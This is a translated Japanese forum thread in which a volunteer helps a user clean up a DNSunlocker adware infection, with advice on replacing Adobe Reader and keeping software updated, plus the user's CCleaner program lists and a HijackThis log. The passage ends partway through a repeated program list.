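I am very sorry for the inconvenience, but I will be away from home for the holidays starting today, so I will not be able to do the work, and I think my report will also come about a week from now.

There will be a gap, but I intend to get to work as soon as I return home.

So please excuse me for a little while.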
  • あすとろ
  • 2015/09/17 (Thu) 21:15:55
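Please work and reply at a comfortable pace
Good evening.
It sounds like you are busy, so do not worry about this side.
It is fine to do the work and reply at a pace that does not strain you.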
  • 悪代官
  • 2015/09/18 (Fri) 21:46:35
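Re: DNSunlocker infection
Sorry to have kept you waiting so long. The work is complete, so I am posting the log.

Adobe Reader remains in the log, but in GU it appears to have been removed (it is not displayed).
I decided I would not use World of Warships, so I handled it the same way.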


7-Zip 9.20 (x64 edition) Igor Pavlov 2014/04/02 4.53 MB 9.20.00.0
Acer Backup Manager NTI Corporation 2012/06/20 337 MB 3.0.0.100
Acer eRecovery Management Acer Incorporated 2012/06/20 5.00.3508
Acer Registration Acer Incorporated 2013/08/08 1.04.3507
Acer ScreenSaver Acer Incorporated 2013/08/08 20.11.1107.1418
Adobe AIR Adobe Systems Incorporated 2014/04/23 13.0.0.83
Adobe Flash Player 19 ActiveX Adobe Systems Incorporated 2015/09/24 17.4 MB 19.0.0.185
Adobe Flash Player 19 NPAPI Adobe Systems Incorporated 2015/09/24 17.9 MB 19.0.0.185
Adobe Reader X (10.1.15) MUI 2015/09/07
Apple Application Support(32 ビット) Apple Inc. 2015/04/18 94.2 MB 3.1.3
Apple Application Support(64 ビット) Apple Inc. 2015/04/18 107 MB 3.1.3
Apple Mobile Device Support Apple Inc. 2015/08/24 23.1 MB 8.1.1.3
Apple Software Update Apple Inc. 2014/04/07 2.38 MB 2.1.3.127
Battlelog Web Plugins EA Digital Illusions CE AB 2015/02/04 2.6.2
Bonjour Apple Inc. 2014/06/04 2.00 MB 3.0.0.10
Borderlands 2 Gearbox Software 2015/03/06
Broadcom Card Reader Driver Installer Broadcom Corporation 2013/08/08 2.76 MB 15.0.7.3
Broadcom NetLink Controller Broadcom Corporation 2012/06/20 524 KB 15.0.7.1
Broadcom Wireless Utility Broadcom Corporation 2013/08/08 5.100.82.120
CCleaner Piriform 2015/09/06 5.09
Chrome Remote Desktop Host Google Inc. 2015/09/24 18.1 MB 46.0.2490.13
CyberLink MediaEspresso CyberLink Corp. 2012/06/20 166 MB 6.5.2727_43992
DisplayLink Core Software DisplayLink Corp. 2015/06/22 26.8 MB 7.8.63104.0
DisplayLink Graphics DisplayLink Corp. 2015/06/22 4.48 MB 7.8.63153.0
Dropbox Dropbox, Inc. 2015/09/04 3.8.8
ETDWare PS/2-X64 10.6.9.9_WHQL ELAN Microelectronic Corp. 2013/08/08 10.6.9.9
Explzh for Windows (64bit) pon software 2014/11/26 7.2.3.0
Fallout 3 - Game of the Year Edition Bethesda Game Studios 2015/06/22
Google Chrome Google Inc. 2015/09/09 45.0.2454.99
Google 日本語入力 Google Inc. 2015/09/12 86.9 MB 2.17.2300.0
Hangame 2015/06/10
Identity Card Acer Incorporated 2013/08/08 1.00.3501
Intel(R) Control Center Intel Corporation 2013/08/09 1.2.1.1007
Intel(R) Management Engine Components Intel Corporation 2013/08/09 8.0.2.1410
Intel(R) OpenCL CPU Runtime Intel Corporation 2013/08/08
Intel(R) Processor Graphics Intel Corporation 2013/08/09 8.15.10.2712
Intel(R) Rapid Storage Technology Intel Corporation 2013/08/09 11.1.0.1006
Intel® Trusted Connect Service Client Intel Corporation 2013/08/08 10.6 MB 1.23.605.1
iTunes Apple Inc. 2015/08/24 242 MB 12.1.2.27
Jane Style Version 3.83 Jane, Inc. 2015/04/06 3.83
Janetter 4.3.0.2 Jane, Inc. 2014/11/26
Java 8 Update 60 Oracle Corporation 2015/09/07 20.6 MB 8.0.600.27
Launch Manager Acer Inc. 2013/08/08 5.1.15
League of Legends Riot Games 2015/05/18 3.0.1
Left 4 Dead 2 Valve 2014/06/19
LEGO® Worlds TT Games 2015/06/22
Logicool ゲーム ソフトウェア 8.57 Logicool 2015/04/06 110 MB 8.57.145
LogMeIn Hamachi LogMeIn, Inc. 2015/08/03 2.2.0.383
Microsoft .NET Framework 4.5.1 (日本語) Microsoft Corporation 2014/04/09 2.93 MB 4.5.50938
Microsoft .NET Framework 4.5.2 Microsoft Corporation 2015/01/29 38.8 MB 4.5.51209
Microsoft Games for Windows - LIVE Redistributable Microsoft Corporation 2015/06/22 32.5 MB 2.0.672.0
Microsoft OneDrive Microsoft Corporation 2015/08/20 36.1 MB 17.3.5930.0814
Microsoft Security Essentials Microsoft Corporation 2015/05/18 4.8.204.0
Microsoft Silverlight Microsoft Corporation 2015/05/18 150 MB 5.1.40416.0
Microsoft SQL Server 2005 Compact Edition [ENU] Microsoft Corporation 2012/06/20 1.69 MB 3.1.0000
Microsoft Visual C++ 2005 Redistributable Microsoft Corporation 2012/06/20 300 KB 8.0.59193
Microsoft Visual C++ 2005 Redistributable (x64) Microsoft Corporation 2013/08/08 708 KB 8.0.61000
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 Microsoft Corporation 2013/08/08 788 KB 9.0.30729
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 Microsoft Corporation 2014/04/08 788 KB 9.0.30729.6161
Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022 Microsoft Corporation 2015/03/06 1.41 MB 9.0.21022
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729 Microsoft Corporation 2012/06/20 608 KB 9.0.30729
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 Microsoft Corporation 2012/06/20 586 KB 9.0.30729
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 Microsoft Corporation 2013/08/08 592 KB 9.0.30729.4148
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 Microsoft Corporation 2014/04/08 600 KB 9.0.30729.6161
Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 Microsoft Corporation 2015/06/22 15.2 MB 10.0.40219
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 Microsoft Corporation 2015/06/22 12.2 MB 10.0.40219
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 Microsoft Corporation 2015/06/22 20.5 MB 11.0.61030.0
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 Microsoft Corporation 2015/06/22 17.3 MB 11.0.61030.0
Microsoft XNA Framework Redistributable 4.0 Microsoft Corporation 2014/08/05 8.03 MB 4.0.20823.0
Mozilla Firefox 40.0.3 (x86 ja) Mozilla 2015/09/14 84.7 MB 40.0.3
Mozilla Maintenance Service Mozilla 2015/09/13 233 KB 40.0.3
MyWinLocker Suite Egis Technology Inc. 2012/06/20 2.63 MB 4.0.14.19
Norton Online Backup Symantec Corporation 2012/06/20 6.19 MB 2.1.17869
NTI Media Maker 9 NTI Corporation 2013/08/08 0.96 GB 9.0.2.9006
Origin Electronic Arts, Inc. 2014/05/11 9.4.7.2799
PDF-Viewer Tracker Software Products Ltd 2015/09/26 23.5 MB 2.5.315.0
Portal 2 Valve 2015/01/29
PunkBuster Services Even Balance, Inc. 2015/02/04 0.994
Realtek High Definition Audio Driver Realtek Semiconductor Corp. 2013/08/08 6.0.1.6543
RED BELT SKIN Series 2014/10/18
Skype Click to Call Microsoft Corporation 2015/09/26 10.2 MB 7.4.0.9058
Skype(TM) 7.10 Skype Technologies S.A. 2015/09/26 72.6 MB 7.10.101
Starbound 2015/01/29
Starbound - Unstable 2015/06/22
Steam Valve Corporation 2014/04/23
TeamSpeak 3 Client TeamSpeak Systems GmbH 2015/02/22 3.0.16
Terraria Re-Logic 2014/08/05
The Walking Dead 2015/01/29
The Walking Dead: Season Two Telltale Games 2015/01/29
Unity Web Player Unity Technologies ApS 2014/05/12 12.0 MB
VLC media player VideoLAN 2015/09/07 2.2.1
Welcome Center Acer Incorporated 2013/08/08 1.02.3507
Windows Live Essentials Microsoft Corporation 2012/06/20 15.4.3538.0513
XMedia Recode バージョン 3.1.9.0 XMedia Recode 2014/06/21 23.6 MB 3.1.9.0
らくらく無線スタートEX NEC AccessTechnica, Ltd. 2014/07/08
インテル(R) ターボ・ブースト・テクノロジー・モニター 2.5 インテル 2013/08/08 13.2 MB 2.5.1.0
  • あすとろ
  • 2015/09/26 (Sat) 01:30:25
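Is the new PDF app working without problems?
Thank you for the work and the report.

>Adobe Reader remains in the log, but in GU it appears to have been removed (it is not displayed).
>I decided I would not use World of Warships, so I handled it the same way.

Yes, understood. Then that part is fine.

It looks like you were also able to install the PDF app.
How is the usability of the new PDF app?
If it is hard to use, it is possible to switch to a different PDF app, but jumping at a dubious app can make things worse, so if you want to install a different PDF app, please let me know.
If there is a specific app you want to use, tell me its name in a reply and I can look into it.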
  • 悪代官
  • 2015/09/26 (Sat) 21:16:30
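Re: DNSunlocker infection
>It looks like you were also able to install the PDF app.
>How is the usability of the new PDF app?

For now I do not use PDF files much, so I cannot really say... (lol)

Since I went to the trouble of installing it, if I have occasion to use it in the future I will use it and get used to it along the way.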
  • あすとろ
  • 2015/09/27 (Sun) 01:33:50
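Now, rechecking the overall state
Good morning.

>For now I do not use PDF files much, so I cannot really say

I see. Then for now just leave it installed.
If you ever need to view a PDF file in the future, you can check it then.
Many official sites for your home appliances, PC apps, hardware and so on present manuals and documentation as PDFs, so it is best to have a PDF viewer installed.

As for Adobe Reader, its bugs seem to have become especially bad recently.
In other people's consultations too, those who have managed to update properly to the latest version are now the rarer case.
So at this point I have started recommending that people who use Adobe Reader uninstall it once and then switch to an alternative PDF app.
Even for a free app, when update failures and removal failures occur this often and cannot be fixed, merely having it installed is a problem.

So, are any abnormalities appearing at present?
If so, please tell me about them.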
  • 悪代官
  • 2015/09/27 (Sun) 07:12:42
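Re: DNSunlocker infection
Hello.

>As for Adobe Reader, its bugs seem to have become especially bad recently.
>In other people's consultations too, those who have managed to update properly to the latest version are now the rarer case.

That is the first I have heard of it. In that case there is no problem uninstalling it.

So far there are no noticeable symptoms, no harm from other adware, and I am able to use the PC without problems.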
  • あすとろ
  • 2015/09/27 (Sun) 13:17:33
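Now we just wait for the observation results
My reply is late again tonight.

>So far there are no noticeable symptoms, no harm from other adware, and I am able to use the PC without problems.

Yes, it looks like the abnormalities have subsided.
Adobe vulnerabilities are constantly exploited in attacks around the world, so although indirect, they have long been a quite serious cause of infection.
With other apps too, neglecting updates often leads to infection through attacks that target them, so always remember to check for updates of all kinds, including Windows Update.

So, since the abnormalities seem to have subsided, please keep observing for a while.
Just use the PC normally and watch it for one week.

One week from now, retake the logs from each CC tab, the installed-programs information and the HJT log, and post them in a reply together with a report on the state during the observation period.

The logs and the state after this observation period will probably be the final hurdle, but if you see any recurrence of the abnormalities, there is no need to wait the full week; report it right then.

I hope the observation period ends without incident.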
  • 悪代官
  • 2015/09/27 (Sun) 21:12:22
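Re: DNSunlocker infection
>Adobe vulnerabilities are constantly exploited in attacks around the world, so although indirect, they have long been a quite serious cause of infection.
>With other apps too, neglecting updates often leads to infection through attacks that target them, so always remember to check for updates of all kinds, including Windows Update.

I learned something. I will be careful from now on.

I will observe for a while, so please excuse me for a short time.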
  • あすとろ
  • 2015/09/27 (Sun) 22:45:51
Re: DNSunlocker infection
I apologize for the late reply.

I observed as instructed, and I think I am able to use the PC without problems, as before.

The logs follow below.


hjt--------------

Logfile of Trend Micro HijackThis v2.0.5
Scan saved at 12:26:43, on 2015/10/05
Platform: Windows 7 SP1 (WinNT 6.00.3505)
MSIE: Internet Explorer v9.00 (9.00.8112.16659)

FIREFOX: 40.0.3 (x86 ja)
Boot mode: Normal

Running processes:
C:\Users\【ユーザー名】\AppData\Roaming\Dropbox\bin\Dropbox.exe
C:\Program Files (x86)\NTI\Acer Backup Manager\BackupManagerTray.exe
C:\Program Files (x86)\Launch Manager\LManager.exe
C:\Program Files (x86)\iTunes\iTunesHelper.exe
C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
C:\Program Files (x86)\CyberLink\MediaEspresso\DeviceDetector\DeviceDetector.exe
C:\Program Files (x86)\Google\Google Japanese Input\GoogleIMEJaConverter.exe
C:\Program Files (x86)\Google\Google Japanese Input\GoogleIMEJaRenderer.exe
C:\Program Files (x86)\Janetter2\bin\Janetter.exe
C:\Program Files (x86)\Janetter2\bin\janettersrv.exe
C:\Program Files (x86)\Janetter2\bin\Janetter.exe
C:\Users\【ユーザー名】\Downloads\HijackThis.exe

F2 - REG:system.ini: UserInit=userinit.exe
O1 - Hosts: 127.0.0.1 localhost
O1 - Hosts: ::1 localhost
O2 - BHO: Java(tm) Plug-In SSV Helper - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files (x86)\Java\jre1.8.0_60\bin\ssv.dll
O2 - BHO: SkypeIEPluginBHO - {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll
O2 - BHO: Java(tm) Plug-In 2 SSV Helper - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files (x86)\Java\jre1.8.0_60\bin\jp2ssv.dll
O4 - HKLM\..\Run: [SuiteTray] "C:\Program Files (x86)\EgisTec MyWinLockerSuite\x86\SuiteTray.exe"
O4 - HKLM\..\Run: [BackupManagerTray] "C:\Program Files (x86)\NTI\Acer Backup Manager\BackupManagerTray.exe" -h -k
O4 - HKLM\..\Run: [LManager] C:\Program Files (x86)\Launch Manager\LManager.exe
O4 - HKLM\..\Run: [Google Japanese Input Prelauncher] "C:\Program Files (x86)\Google\Google Japanese Input\GoogleIMEJaBroker32.exe" --mode=prelaunch_processes
O4 - HKLM\..\Run: [iTunesHelper] "C:\Program Files (x86)\iTunes\iTunesHelper.exe"
O4 - HKLM\..\Run: [SunJavaUpdateSched] "C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe"
O4 - HKCU\..\Run: [Dropbox Update] "C:\Users\【ユーザー名】\AppData\Local\Dropbox\Update\DropboxUpdate.exe" /c
O4 - HKCU\..\Run: [CCleaner Monitoring] "C:\Program Files\CCleaner\CCleaner64.exe" /MONITOR
O4 - HKUS\S-1-5-18\..\RunOnce: [IsMyWinLockerReboot] msiexec.exe /qn /x{voidguid} (User 'SYSTEM')
O4 - HKUS\.DEFAULT\..\RunOnce: [IsMyWinLockerReboot] msiexec.exe /qn /x{voidguid} (User 'Default user')
O4 - Startup: Dropbox.lnk = 【ユーザー名】\AppData\Roaming\Dropbox\bin\Dropbox.exe
O9 - Extra button: @C:\Program Files (x86)\Windows Live\Writer\WindowsLiveWriterShortcuts.dll,-1004 - {219C3416-8CB2-491a-A3C7-D9FCDDC9D600} - C:\Program Files (x86)\Windows Live\Writer\WriterBrowserExtension.dll
O9 - Extra 'Tools' menuitem: @C:\Program Files (x86)\Windows Live\Writer\WindowsLiveWriterShortcuts.dll,-1003 - {219C3416-8CB2-491a-A3C7-D9FCDDC9D600} - C:\Program Files (x86)\Windows Live\Writer\WriterBrowserExtension.dll
O9 - Extra button: Skype Click to Call settings - {898EA8C8-E7FF-479B-8935-AEC46303B9E5} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll
O10 - Unknown file in Winsock LSP: c:\program files (x86)\common files\microsoft shared\windows live\wlidnsp.dll
O10 - Unknown file in Winsock LSP: c:\program files (x86)\common files\microsoft shared\windows live\wlidnsp.dll
O11 - Options group: [ACCELERATED_GRAPHICS] Accelerated graphics
O15 - ESC Trusted Zone: http://*.update.microsoft.com
O17 - HKLM\System\CCS\Services\Tcpip\..\{0D1049C0-2DE4-4B95-B96D-43C07C70251C}: NameServer = 199.203.131.145,82.163.143.167
O17 - HKLM\System\CCS\Services\Tcpip\..\{5079169B-AD83-42A3-B1B3-C04B8C96D5A8}: NameServer = 199.203.131.145,82.163.143.167
O17 - HKLM\System\CCS\Services\Tcpip\..\{C678E09F-B902-4D1E-87D2-AE9B8DCDE689}: NameServer = 192.168.50.1
O17 - HKLM\System\CS1\Services\Tcpip\..\{0D1049C0-2DE4-4B95-B96D-43C07C70251C}: NameServer = 199.203.131.145,82.163.143.167
O17 - HKLM\System\CS2\Services\Tcpip\..\{0D1049C0-2DE4-4B95-B96D-43C07C70251C}: NameServer = 199.203.131.145,82.163.143.167
O18 - Protocol: skypec2c - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll
O18 - Protocol: wlpg - {E43EF6CD-A37A-4A9B-9E6F-83F89B8E6324} - C:\Program Files (x86)\Windows Live\Photo Gallery\AlbumDownloadProtocolHandler.dll
O23 - Service: Adobe Acrobat Update Service (AdobeARMservice) - Adobe Systems Incorporated - C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
O23 - Service: Adobe Flash Player Update Service (AdobeFlashPlayerUpdateSvc) - Adobe Systems Incorporated - C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
O23 - Service: @%SystemRoot%\system32\Alg.exe,-112 (ALG) - Unknown owner - C:\Windows\System32\alg.exe (file missing)
O23 - Service: Apple Mobile Device - Apple Inc. - C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
O23 - Service: Bonjour サービス (Bonjour Service) - Apple Inc. - C:\Program Files\Bonjour\mDNSResponder.exe
O23 - Service: Chrome リモート デスクトップ サービス (chromoting) - Google Inc. - C:\Program Files (x86)\Google\Chrome Remote Desktop\46.0.2490.13\remoting_host.exe
O23 - Service: Intel(R) Content Protection HECI Service (cphs) - Intel Corporation - C:\Windows\SysWow64\IntelCpHeciSvc.exe
O23 - Service: DisplayLinkManager (DisplayLinkService) - DisplayLink Corp. - C:\Program Files\DisplayLink Core Software\DisplayLinkManager.exe
O23 - Service: Dritek WMI Service (DsiWMIService) - Dritek System Inc. - C:\Program Files (x86)\Launch Manager\dsiwmis.exe
O23 - Service: @%SystemRoot%\system32\efssvc.dll,-100 (EFS) - Unknown owner - C:\Windows\System32\lsass.exe (file missing)
O23 - Service: EgisTec Ticket Service - Egis Technology Inc. - C:\Program Files (x86)\Common Files\EgisTec\Services\EgisTicketService.exe
O23 - Service: @%systemroot%\system32\fxsresm.dll,-118 (Fax) - Unknown owner - C:\Windows\system32\fxssvc.exe (file missing)
O23 - Service: FLEXnet Licensing Service - Acresso Software Inc. - C:\Program Files (x86)\Common Files\Macrovision Shared\FLEXnet Publisher\FNPLicensingService.exe
O23 - Service: @C:\Program Files (x86)\Google\Google Japanese Input\GoogleIMEJaCacheService.exe,-100 (GoogleIMEJaCacheService) - Google Inc. - C:\Program Files (x86)\Google\Google Japanese Input\GoogleIMEJaCacheService.exe
O23 - Service: GREGService - Acer Incorporated - C:\Program Files (x86)\Acer\Registration\GREGsvc.exe
O23 - Service: Google Update サービス (gupdate) (gupdate) - Google Inc. - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
O23 - Service: Google Update サービス (gupdatem) (gupdatem) - Google Inc. - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
O23 - Service: LogMeIn Hamachi Tunneling Engine (Hamachi2Svc) - LogMeIn Inc. - C:\Program Files (x86)\LogMeIn Hamachi\hamachi-2.exe
O23 - Service: Intel(R) Rapid Storage Technology (IAStorDataMgrSvc) - Intel Corporation - C:\Program Files (x86)\Intel\Intel(R) Rapid Storage Technology\IAStorDataMgrSvc.exe
O23 - Service: Intel(R) Capability Licensing Service Interface - Intel(R) Corporation - C:\Program Files\Intel\iCLS Client\HeciServer.exe
O23 - Service: iPod サービス (iPod Service) - Apple Inc. - C:\Program Files\iPod\bin\iPodService.exe
O23 - Service: Intel(R) Dynamic Application Loader Host Interface Service (jhi_service) - Intel Corporation - C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe
O23 - Service: @keyiso.dll,-100 (KeyIso) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: Live Updater Service - Acer Incorporated - C:\Program Files\Acer\Acer Updater\UpdaterService.exe
O23 - Service: LMIGuardianSvc - LogMeIn, Inc. - C:\Program Files (x86)\LogMeIn Hamachi\LMIGuardianSvc.exe
O23 - Service: Intel(R) Management and Security Application Local Management Service (LMS) - Intel Corporation - C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe
O23 - Service: McAfee McShield (McShield) - McAfee, Inc. - C:\Program Files\Common Files\McAfee\SystemCore\\mcshield.exe
O23 - Service: McAfee Firewall Core Service (mfefire) - McAfee, Inc. - C:\Program Files\Common Files\McAfee\SystemCore\\mfefire.exe
O23 - Service: McAfee Validation Trust Protection Service (mfevtp) - Unknown owner - C:\Windows\system32\mfevtps.exe (file missing)
O23 - Service: Mozilla Maintenance Service (MozillaMaintenance) - Mozilla Foundation - C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
O23 - Service: @comres.dll,-2797 (MSDTC) - Unknown owner - C:\Windows\System32\msdtc.exe (file missing)
O23 - Service: @%SystemRoot%\System32\netlogon.dll,-102 (Netlogon) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: Norton Online Backup (NOBU) - Symantec Corporation - C:\Program Files (x86)\Symantec\Norton Online Backup\NOBuAgent.exe
O23 - Service: NTI IScheduleSvc - NTI Corporation - C:\Program Files (x86)\NTI\Acer Backup Manager\IScheduleSvc.exe
O23 - Service: Origin Client Service - Electronic Arts - C:\Program Files (x86)\Origin\OriginClientService.exe
O23 - Service: PnkBstrA - Unknown owner - C:\Windows\system32\PnkBstrA.exe
O23 - Service: @%systemroot%\system32\psbase.dll,-300 (ProtectedStorage) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: @%systemroot%\system32\Locator.exe,-2 (RpcLocator) - Unknown owner - C:\Windows\system32\locator.exe (file missing)
O23 - Service: @%SystemRoot%\system32\samsrv.dll,-1 (SamSs) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: Skype Updater (SkypeUpdate) - Skype Technologies - C:\Program Files (x86)\Skype\Updater\Updater.exe
O23 - Service: @%SystemRoot%\system32\snmptrap.exe,-3 (SNMPTRAP) - Unknown owner - C:\Windows\System32\snmptrap.exe (file missing)
O23 - Service: @%systemroot%\system32\spoolsv.exe,-1 (Spooler) - Unknown owner - C:\Windows\System32\spoolsv.exe (file missing)
O23 - Service: @%SystemRoot%\system32\sppsvc.exe,-101 (sppsvc) - Unknown owner - C:\Windows\system32\sppsvc.exe (file missing)
O23 - Service: Steam Client Service - Valve Corporation - C:\Program Files (x86)\Common Files\Steam\SteamService.exe
O23 - Service: @%SystemRoot%\servicing\TrustedInstaller.exe,-100 (TrustedInstaller) - Unknown owner - C:\Windows\servicing\TrustedInstaller.exe (file missing)
O23 - Service: Intel(R) Turbo Boost Technology Monitor 2.5 (TurboBoost) - Intel(R) Corporation - C:\Program Files\Intel\TurboBoost\TurboBoost.exe
O23 - Service: @%SystemRoot%\system32\ui0detect.exe,-101 (UI0Detect) - Unknown owner - C:\Windows\system32\UI0Detect.exe (file missing)
O23 - Service: Intel(R) Management and Security Application User Notification Service (UNS) - Intel Corporation - C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\UNS\UNS.exe
O23 - Service: @%SystemRoot%\system32\vaultsvc.dll,-1003 (VaultSvc) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: @%SystemRoot%\system32\vds.exe,-100 (vds) - Unknown owner - C:\Windows\System32\vds.exe (file missing)
O23 - Service: @%systemroot%\system32\vssvc.exe,-102 (VSS) - Unknown owner - C:\Windows\system32\vssvc.exe (file missing)
O23 - Service: @%systemroot%\system32\wbengine.exe,-104 (wbengine) - Unknown owner - C:\Windows\system32\wbengine.exe (file missing)
O23 - Service: Broadcom Wireless LAN Tray Service (wltrysvc) - Broadcom Corporation - C:\Program Files\Broadcom\Broadcom 802.11 Network Adapter\WLTRYSVC.EXE
O23 - Service: @%Systemroot%\system32\wbem\wmiapsrv.exe,-110 (wmiApSrv) - Unknown owner - C:\Windows\system32\wbem\WmiApSrv.exe (file missing)
O23 - Service: @%PROGRAMFILES%\Windows Media Player\wmpnetwk.exe,-101 (WMPNetworkSvc) - Unknown owner - C:\Program Files (x86)\Windows Media Player\wmpnetwk.exe (file missing)

--
End of file - 12001 bytes


cc install-----------------

7-Zip 9.20 (x64 edition) Igor Pavlov 2014/04/02 4.53 MB 9.20.00.0
Acer Backup Manager NTI Corporation 2012/06/20 337 MB 3.0.0.100
Acer eRecovery Management Acer Incorporated 2012/06/20 5.00.3508
Acer Registration Acer Incorporated 2013/08/08 1.04.3507
Acer ScreenSaver Acer Incorporated 2013/08/08 20.11.1107.1418
Adobe AIR Adobe Systems Incorporated 2014/04/23 13.0.0.83
Adobe Flash Player 19 ActiveX Adobe Systems Incorporated 2015/09/24 17.4 MB 19.0.0.185
Adobe Flash Player 19 NPAPI Adobe Systems Incorporated 2015/09/24 17.9 MB 19.0.0.185
Adobe Reader X (10.1.15) MUI 2015/09/07
Apple Application Support(32 ビット) Apple Inc. 2015/04/18 94.2 MB 3.1.3
Apple Application Support(64 ビット) Apple Inc. 2015/04/18 107 MB 3.1.3
Apple Mobile Device Support Apple Inc. 2015/08/24 23.1 MB 8.1.1.3
Apple Software Update Apple Inc. 2014/04/07 2.38 MB 2.1.3.127
Battlelog Web Plugins EA Digital Illusions CE AB 2015/02/04 2.6.2
Bonjour Apple Inc. 2014/06/04 2.00 MB 3.0.0.10
Borderlands 2 Gearbox Software 2015/03/06
Broadcom Card Reader Driver Installer Broadcom Corporation 2013/08/08 2.76 MB 15.0.7.3
Broadcom NetLink Controller Broadcom Corporation 2012/06/20 524 KB 15.0.7.1
Broadcom Wireless Utility Broadcom Corporation 2013/08/08 5.100.82.120
CCleaner Piriform 2015/09/06 5.09
Chrome Remote Desktop Host Google Inc. 2015/09/24 18.1 MB 46.0.2490.13
CyberLink MediaEspresso CyberLink Corp. 2012/06/20 166 MB 6.5.2727_43992
DisplayLink Core Software DisplayLink Corp. 2015/06/22 26.8 MB 7.8.63104.0
DisplayLink Graphics DisplayLink Corp. 2015/06/22 4.48 MB 7.8.63153.0
Dropbox Dropbox, Inc. 2015/10/03 3.10.7
ETDWare PS/2-X64 10.6.9.9_WHQL ELAN Microelectronic Corp. 2013/08/08 10.6.9.9
Explzh for Windows (64bit) pon software 2014/11/26 7.2.3.0
Fallout 3 - Game of the Year Edition Bethesda Game Studios 2015/06/22
Google Chrome Google Inc. 2015/09/09 45.0.2454.101
Google 日本語入力 Google Inc. 2015/09/12 86.9 MB 2.17.2300.0
Hangame 2015/06/10
Identity Card Acer Incorporated 2013/08/08 1.00.3501
Intel(R) Control Center Intel Corporation 2013/08/09 1.2.1.1007
Intel(R) Management Engine Components Intel Corporation 2013/08/09 8.0.2.1410
Intel(R) OpenCL CPU Runtime Intel Corporation 2013/08/08
Intel(R) Processor Graphics Intel Corporation 2013/08/09 8.15.10.2712
Intel(R) Rapid Storage Technology Intel Corporation 2013/08/09 11.1.0.1006
Intel® Trusted Connect Service Client Intel Corporation 2013/08/08 10.6 MB 1.23.605.1
iTunes Apple Inc. 2015/08/24 242 MB 12.1.2.27
Jane Style Version 3.83 Jane, Inc. 2015/04/06 3.83
Janetter 4.3.0.2 Jane, Inc. 2014/11/26
Java 8 Update 60 Oracle Corporation 2015/09/07 20.6 MB 8.0.600.27
Launch Manager Acer Inc. 2013/08/08 5.1.15
League of Legends Riot Games 2015/05/18 3.0.1
Left 4 Dead 2 Valve 2014/06/19
LEGO® Worlds TT Games 2015/06/22
Logicool ゲーム ソフトウェア 8.57 Logicool 2015/04/06 110 MB 8.57.145
LogMeIn Hamachi LogMeIn, Inc. 2015/08/03 2.2.0.383
Microsoft .NET Framework 4.5.1 (日本語) Microsoft Corporation 2014/04/09 2.93 MB 4.5.50938
Microsoft .NET Framework 4.5.2 Microsoft Corporation 2015/01/29 38.8 MB 4.5.51209
Microsoft Games for Windows - LIVE Redistributable Microsoft Corporation 2015/06/22 32.5 MB 2.0.672.0
Microsoft OneDrive Microsoft Corporation 2015/08/20 36.1 MB 17.3.5930.0814
Microsoft Security Essentials Microsoft Corporation 2015/05/18 4.8.204.0
Microsoft Silverlight Microsoft Corporation 2015/05/18 150 MB 5.1.40416.0
Microsoft SQL Server 2005 Compact Edition [ENU] Microsoft Corporation 2012/06/20 1.69 MB 3.1.0000
Microsoft Visual C++ 2005 Redistributable Microsoft Corporation 2012/06/20 300 KB 8.0.59193
Microsoft Visual C++ 2005 Redistributable (x64) Microsoft Corporation 2013/08/08 708 KB 8.0.61000
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 Microsoft Corporation 2013/08/08 788 KB 9.0.30729
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 Microsoft Corporation 2014/04/08 788 KB 9.0.30729.6161
Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022 Microsoft Corporation 2015/03/06 1.41 MB 9.0.21022
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729 Microsoft Corporation 2012/06/20 608 KB 9.0.30729
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 Microsoft Corporation 2012/06/20 586 KB 9.0.30729
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 Microsoft Corporation 2013/08/08 592 KB 9.0.30729.4148
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 Microsoft Corporation 2014/04/08 600 KB 9.0.30729.6161
Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 Microsoft Corporation 2015/06/22 15.2 MB 10.0.40219
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 Microsoft Corporation 2015/06/22 12.2 MB 10.0.40219
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 Microsoft Corporation 2015/06/22 20.5 MB 11.0.61030.0
